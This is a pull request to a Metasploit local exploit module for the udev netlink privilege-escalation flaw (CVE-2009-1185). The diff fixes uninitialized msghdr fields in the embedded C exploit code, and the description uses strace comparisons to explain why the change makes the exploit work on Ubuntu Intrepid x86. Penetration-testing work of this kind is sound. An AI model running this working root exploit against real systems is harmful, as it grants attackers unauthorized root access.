### PR TITLE
udev_netlink fix while testing ubuntu intrepid

### DIFF
--- a/modules/exploits/linux/local/udev_netlink.rb
+++ b/modules/exploits/linux/local/udev_netlink.rb
@@ -164,6 +164,7 @@ int main() {
 	sa.nl_pid = #{netlink_pid};
 	sa.nl_groups = 0;
 
+	memset(&msg, 0x00, sizeof(struct msghdr));
 	msg.msg_name = (void *)&sa;
 	msg.msg_namelen = sizeof(sa);
 	msg.msg_iov = &iov;

--- a/modules/exploits/linux/local/udev_netlink.rb
+++ b/modules/exploits/linux/local/udev_netlink.rb
@@ -51,7 +51,8 @@ class Metasploit4 < Msf::Exploit::Local
 				'References'    =>
 					[
 						[ 'CVE', '2009-1185' ],
-						[ 'BID', '34536' ],
+						[ 'OSVDB', '53810' ],
+						[ 'BID', '34536' ]
 					],
 				'Targets'       =>
 					[
@@ -148,6 +149,7 @@ class Metasploit4 < Msf::Exploit::Local
 		main = %Q^
 #include <string.h>
 #include <linux/netlink.h>
+#define NULL 0
 
 int main() {
 	int sock;
@@ -166,6 +168,9 @@ int main() {
 	msg.msg_namelen = sizeof(sa);
 	msg.msg_iov = &iov;
 	msg.msg_iovlen = 1;
+	msg.msg_control = NULL;
+	msg.msg_controllen = 0;
+	msg.msg_flags = 0;
 
 	sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
 	bind(sock, (struct sockaddr *) &sa, sizeof(sa));


### PR DESCRIPTION
Module wasn't working on Ubuntu intrepid x86, while the original exploit from Jon Oberheide was working fine. 

After running bot exploits with strace there seems to be an important difference:
- Original exploit:

<pre>
sendmsg(3, {msg_name(12)={sa_family=AF_NETLINK, pid=2471, groups=00000000}, msg_iov(1)=[{"remove@/d\0SUBSYSTEM=block\0DEVPAT"..., 88}], msg_controllen=0, msg_flags=0}, 0) = 88
</pre>

- Our msf port:

<pre>
sendmsg(3, {msg_name(12)={sa_family=AF_NETLINK, pid=2471, groups=00000000}, msg_iov(1)=[{"remove@/d\0SUBSYSTEM=block\0DEVPAT"..., 102}], msg_controllen=3086273419, msg_control=0, msg_flags=MSG_DONTROUTE|MSG_PROXY|MSG_EOR|MSG_WAITALL|MSG_TRUNC|MSG_ERRQUEUE|MSG_DONTWAIT|MSG_CONFIRM|MSG_FIN|MSG_SYN|MSG_MORE|0xb7f50000}, 0) = -1 ENOBUFS (No buffer space available)
</pre>


My guess is we're using uninitialized data for the msghdr struct. Initializing data seems to fix the problem. The exploit generated by msf exploit now works on Ubuntu Intrepid (x86)

On the other hand added OSVDB reference.
